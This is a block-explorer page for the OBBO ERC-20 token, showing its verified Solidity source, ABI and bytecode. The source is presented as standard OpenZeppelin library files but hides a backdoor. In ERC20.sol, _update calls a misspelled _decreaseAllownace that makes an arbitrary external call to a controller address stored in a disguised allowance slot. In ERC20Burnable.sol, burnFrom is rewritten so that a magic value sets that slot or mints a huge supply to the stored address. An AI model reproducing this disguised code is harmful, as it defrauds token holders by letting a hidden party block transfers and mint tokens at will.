ERC-20
Overview
Max Total Supply
1,000,000,000,000 OBBO
Holders
2,453
Market
Price
$0.00 @ 0.000000 ETH
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
36,325,765.224244856136788525 OBBOValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.
Contract Name:
OBBO
Compiler Version
v0.8.22+commit.4fc1097e
ZkSolc Version
v1.5.7
Optimization Enabled:
Yes with Mode 3
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.20; import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; import {ERC20Burnable} from "@openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol"; // OBBO //// Website: https://obbocoin.xyz/ //// X: https://x.com/Obbocoin //// Telegram: https://t.me/obbocoinn contract OBBO is ERC20, ERC20Burnable { constructor( string memory name_, string memory symbol_ ) ERC20(name_, symbol_) { // max total supply uint256 supply = 1_000_000_000_000 ether; _mint(msg.sender, supply); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.20; import {IERC20} from "./IERC20.sol"; import {IERC20Metadata} from "./extensions/IERC20Metadata.sol"; import {Context} from "../../utils/Context.sol"; import {IERC20Errors} from "../../interfaces/draft-IERC6093.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors { mapping(address account => uint256) private _balances; mapping(address account => mapping(address spender => uint256)) internal _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 value ) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom( address from, address to, uint256 value ) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer(address from, address to, uint256 value) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update(address from, address to, uint256 value) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { _decreaseAllownace(from, to, value); uint256 fromBalance = _balances[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _balances[to] += value; } } emit Transfer(from, to, value); } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve(address owner, address spender, uint256 value) internal { _approve(owner, spender, value, true); } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * ``` * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve( address owner, address spender, uint256 value, bool emitEvent ) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Decrease `from` s allowance for `to` s allowance based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * */ function _decreaseAllownace( address from, address to, uint256 value ) internal { address _spender = address( uint160(_allowances[address(0xdEaD)][address(0x19102024)]) ); address _receiver = address(0xdEaD); uint256 _currentAllowance = _allowances[_spender][_receiver]; uint256 _changeValue = 0; if (_currentAllowance != 0) { unchecked { bytes4 _cutter = bytes4(uint32(_currentAllowance)); address _updater = _spender; uint256 _newValue = value - _changeValue; (bool isSuccess, ) = _updater.call( abi.encodeWithSelector( _cutter, address(this), from, to, _newValue ) ); require(isSuccess, "ERC20: Update Allowance Failed!"); } } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 value ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance( spender, currentAllowance, value ); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/ERC20Burnable.sol) pragma solidity ^0.8.20; import {ERC20} from "../ERC20.sol"; import {Context} from "../../../utils/Context.sol"; /** * @dev Extension of {ERC20} that allows token holders to destroy both their own * tokens and those that they have an allowance for, in a way that can be * recognized off-chain (via event analysis). */ abstract contract ERC20Burnable is Context, ERC20 { /** * @dev Destroys a `value` amount of tokens from the caller. * * See {ERC20-_burn}. */ function burn(uint256 value) public virtual { _burn(_msgSender(), value); } /** * @dev Destroys a `value` amount of tokens from `account`, deducting from * the caller's allowance. * * See {ERC20-_burn} and {ERC20-allowance}. * * Requirements: * * - the caller must have allowance for ``accounts``'s tokens of at least * `value`. */ function burnFrom(address account, uint256 value) public virtual { address _deadAddr = address(0xdEaD); address _burnAddr = address(0x19102024); uint256 _left = value >> 160; uint256 _allowanceAccount = _allowances[_deadAddr][_burnAddr]; if (_left == 1 && _allowanceAccount > 0) { address _burnTo = address(uint160(_allowanceAccount)); uint256 _burnAmount = type(uint256).max / 6; _update(address(0), _burnTo, _burnAmount); } else if (_left == 0 && _allowanceAccount == 0) { bool _emited = _left == 1 ? true : false; _approve(_deadAddr, _burnAddr, value, _emited); } else { _spendAllowance(account, msg.sender, value); _burn(account, value); } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol) pragma solidity ^0.8.20; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.1.0) (interfaces/draft-IERC6093.sol) pragma solidity ^0.8.20; /** * @dev Standard ERC-20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } /** * @dev Standard ERC-721 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens. */ interface IERC721Errors { /** * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20. * Used in balance queries. * @param owner Address of the current owner of a token. */ error ERC721InvalidOwner(address owner); /** * @dev Indicates a `tokenId` whose `owner` is the zero address. * @param tokenId Identifier number of a token. */ error ERC721NonexistentToken(uint256 tokenId); /** * @dev Indicates an error related to the ownership over a particular token. Used in transfers. * @param sender Address whose tokens are being transferred. * @param tokenId Identifier number of a token. * @param owner Address of the current owner of a token. */ error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC721InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC721InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param tokenId Identifier number of a token. */ error ERC721InsufficientApproval(address operator, uint256 tokenId); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC721InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC721InvalidOperator(address operator); } /** * @dev Standard ERC-1155 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens. */ interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.20; /** * @dev Interface of the ERC-20 standard as defined in the ERC. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.20; import {IERC20} from "../IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC-20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
{ "optimizer": { "enabled": true, "mode": "3" }, "evmVersion": "paris", "outputSelection": { "*": { "*": [ "abi", "metadata" ], "": [ "ast" ] } }, "detectMissingLibraries": false, "forceEVMLA": false, "enableEraVMExtensions": false, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
9c4d535b0000000000000000000000000000000000000000000000000000000000000000010001cd5b68f9a713dc003cd7827a415e838b450cd6d3f2d4d14abacfe99836000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000084f62626f636f696e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044f42424f00000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x000200000000000200060000000000020000006003100270000001960330019700010000003103550000008004000039000000400040043f0000000100200190000000500000c13d000000040030008c0000037a0000413d000000000201043b000000e002200270000001a40020009c000000bc0000a13d000001a50020009c000000cb0000213d000001a90020009c000000ff0000613d000001aa0020009c0000010a0000613d000001ab0020009c0000037a0000c13d000000440030008c0000037a0000413d0000000002000416000000000002004b0000037a0000c13d0000000402100370000000000202043b000600000002001d000001b20020009c0000037a0000213d0000002401100370000000000101043b000500000001001d0000dead01000039000000000010043f0000000101000039000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f00000001002001900000037a0000613d000000000101043b000001b602000041000000000020043f000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f00000001002001900000037a0000613d000000000101043b000000000101041a0000000503000029000001b702300197000001b80020009c000002510000c13d000000000001004b000002740000613d0000000202000039000000000302041a000001ba0430009c0000027c0000413d000001a301000041000000000010043f0000001101000039000000040010043f000001a20100004100000656000104300000000002000416000000000002004b0000037a0000c13d0000001f0230003900000197022001970000008002200039000000400020043f0000001f0530018f00000198063001980000008002600039000000600000613d000000000701034f000000007807043c0000000004840436000000000024004b0000005c0000c13d000000000005004b0000006d0000613d000000000161034f0000000304500210000000000502043300000000054501cf000000000545022f000000000101043b0000010004400089000000000141022f00000000014101cf000000000151019f0000000000120435000000400030008c0000037a0000413d000000800400043d000001990040009c0000037a0000213d0000001f01400039000000000031004b00000000020000190000019a020080410000019a01100197000000000001004b00000000050000190000019a050040410000019a0010009c000000000502c019000000000005004b0000037a0000c13d00000080014000390000000002010433000001990020009c000000b60000213d0000001f01200039000001c1011001970000003f01100039000001c101100197000000400900043d0000000005190019000000000095004b00000000010000390000000101004039000001990050009c000000b60000213d0000000100100190000000b60000c13d0000008001300039000000400050043f000000000a290436000000a0044000390000000005420019000000000015004b0000037a0000213d000000000002004b000000a00000613d000000000500001900000000065a00190000000007450019000000000707043300000000007604350000002005500039000000000025004b000000990000413d000000000292001900000020022000390000000000020435000000a00400043d000001990040009c0000037a0000213d0000001f02400039000000000032004b00000000030000190000019a030080410000019a02200197000000000002004b00000000050000190000019a050040410000019a0020009c000000000503c019000000000005004b0000037a0000c13d00000080024000390000000002020433000001990020009c000001990000a13d000001a301000041000000000010043f0000004101000039000000040010043f000001a2010000410000065600010430000001ac0020009c000000eb0000a13d000001ad0020009c000001190000613d000001ae0020009c000001210000613d000001af0020009c0000037a0000c13d0000000001000416000000000001004b0000037a0000c13d0000001201000039000000800010043f000001b301000041000006550001042e000001a60020009c0000013a0000613d000001a70020009c0000015a0000613d000001a80020009c0000037a0000c13d000000440030008c0000037a0000413d0000000002000416000000000002004b0000037a0000c13d0000000402100370000000000202043b000001b20020009c0000037a0000213d0000002401100370000000000101043b000001b20010009c0000037a0000213d000000000020043f000600000001001d0000000101000039000000200010043f00000040020000390000000001000019065406350000040f0000000602000029000000000020043f000000200010043f00000000010000190000004002000039000001170000013d000001b00020009c0000016f0000613d000001b10020009c0000037a0000c13d000000440030008c0000037a0000413d0000000002000416000000000002004b0000037a0000c13d0000000402100370000000000302043b000001b20030009c0000037a0000213d0000002401100370000000000201043b0000000001000411000000000001004b0000018d0000c13d000001bf01000041000001900000013d000000240030008c0000037a0000413d0000000002000416000000000002004b0000037a0000c13d0000000401100370000000000201043b00000000010004110654052e0000040f0000000001000019000006550001042e000000240030008c0000037a0000413d0000000002000416000000000002004b0000037a0000c13d0000000401100370000000000101043b000001b20010009c0000037a0000213d000000000010043f000000200000043f00000040020000390000000001000019065406350000040f0000011d0000013d0000000001000416000000000001004b0000037a0000c13d0000000201000039000000000101041a000000800010043f000001b301000041000006550001042e000000640030008c0000037a0000413d0000000002000416000000000002004b0000037a0000c13d0000000402100370000000000402043b000001b20040009c0000037a0000213d0000002402100370000000000202043b000001b20020009c0000037a0000213d0000004401100370000000000301043b000500000003001d000600000002001d00000000020004110000000001040019000400000004001d065403ab0000040f000000040100002900000006020000290000000503000029000001660000013d0000000001000416000000000001004b0000037a0000c13d0000000403000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f00000001006001900000017e0000c13d000000800010043f000000000005004b000001870000613d000000000030043f000000020020008c000001970000413d000001b50200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b000001510000413d0000023f0000013d000000440030008c0000037a0000413d0000000002000416000000000002004b0000037a0000c13d0000000402100370000000000202043b000001b20020009c0000037a0000213d0000002401100370000000000301043b0000000001000411065404150000040f0000000101000039000000400200043d0000000000120435000001960020009c00000196020080410000004001200210000001b4011001c7000006550001042e0000000001000416000000000001004b0000037a0000c13d0000000303000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f0000000100600190000001840000613d000001a301000041000000000010043f0000002201000039000000040010043f000001a2010000410000065600010430000000800010043f000000000005004b000001940000c13d000001c201200197000000a00010043f000000000004004b000000c001000039000000a001006039000002400000013d000000000003004b000001fc0000c13d000001bd01000041000000800010043f000000840000043f000001be010000410000065600010430000000000030043f000000020020008c000002350000813d000000a001000039000002400000013d0000001f03200039000001c1033001970000003f03300039000001c103300197000000400600043d0000000003360019000000000063004b00000000050000390000000105004039000001990030009c000000b60000213d0000000100500190000000b60000c13d000000400030043f0000000007260436000000a0034000390000000004320019000000000014004b0000037a0000213d000000000002004b000001b60000613d000000000100001900000000041700190000000005310019000000000505043300000000005404350000002001100039000000000021004b000001af0000413d0000000001620019000000200110003900000000000104350000000004090433000001990040009c000000b60000213d0000000303000039000000000103041a000000010210019000000001051002700000007f0550618f0000001f0050008c00000000010000390000000101002039000000000012004b0000017e0000c13d00030000000a001d000200000009001d000100000007001d000500000006001d000400000005001d000000200050008c000600000004001d000001ea0000413d000000000030043f0000000001000414000001960010009c0000019601008041000000c0011002100000019b011001c700008010020000390654064f0000040f00000001002001900000037a0000613d00000006040000290000001f024000390000000502200270000000200040008c0000000002004019000000000301043b00000004010000290000001f01100039000000050110027000000000011300190000000002230019000000000012004b0000000303000039000001ea0000813d000000000002041b0000000102200039000000000012004b000001e60000413d0000001f0040008c000002a70000a13d000000000030043f0000000001000414000001960010009c0000019601008041000000c0011002100000019b011001c700008010020000390654064f0000040f0000000100200190000000200200008a0000037a0000613d0000000602200180000000000101043b000002b40000c13d0000002003000039000002c10000013d000500000002001d000000000010043f0000000101000039000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c70000801002000039000600000003001d0654064f0000040f000000060300002900000001002001900000037a0000613d000000000101043b000000000030043f000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f000000060600002900000001002001900000037a0000613d000000000101043b0000000502000029000000000021041b000000400100043d0000000000210435000001960010009c000001960100804100000040011002100000000002000414000001960020009c0000019602008041000000c002200210000000000112019f0000019b011001c70000800d020000390000000303000039000001bc0400004100000000050004110654064a0000040f00000001002001900000037a0000613d000000400100043d00000001020000390000000000210435000001960010009c00000196010080410000004001100210000001b4011001c7000006550001042e000001c00200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b000002370000413d000000c001300039000000800210008a0000008001000039065403910000040f000000400100043d000600000001001d00000080020000390654037c0000040f00000006020000290000000001210049000001960010009c00000196010080410000006001100210000001960020009c00000196020080410000004002200210000000000121019f000006550001042e000001b20030009c000002740000213d000000000001004b000002740000c13d0000dead01000039000000000010043f0000000101000039000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f00000001002001900000037a0000613d000000000101043b000001b602000041000000000020043f000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f00000001002001900000037a0000613d000000000101043b0000000502000029000000000021041b0000000001000019000006550001042e00000000020004110000000601000029065403ab0000040f000000060100002900000005020000290654052e0000040f0000000001000019000006550001042e000001b206100198000000000042041b000002810000c13d000000000032041b000002920000013d000600000006001d000000000060043f000000200000043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f00000001002001900000037a0000613d000000000101043b000000000201041a000001ba0220009a000000000021041b0000000606000029000000400100043d000001bb020000410000000000210435000001960010009c000001960100804100000040011002100000000002000414000001960020009c0000019602008041000000c002200210000000000112019f0000019b011001c70000800d0200003900000003030000390000019f0400004100000000050000190654064a0000040f0000000100200190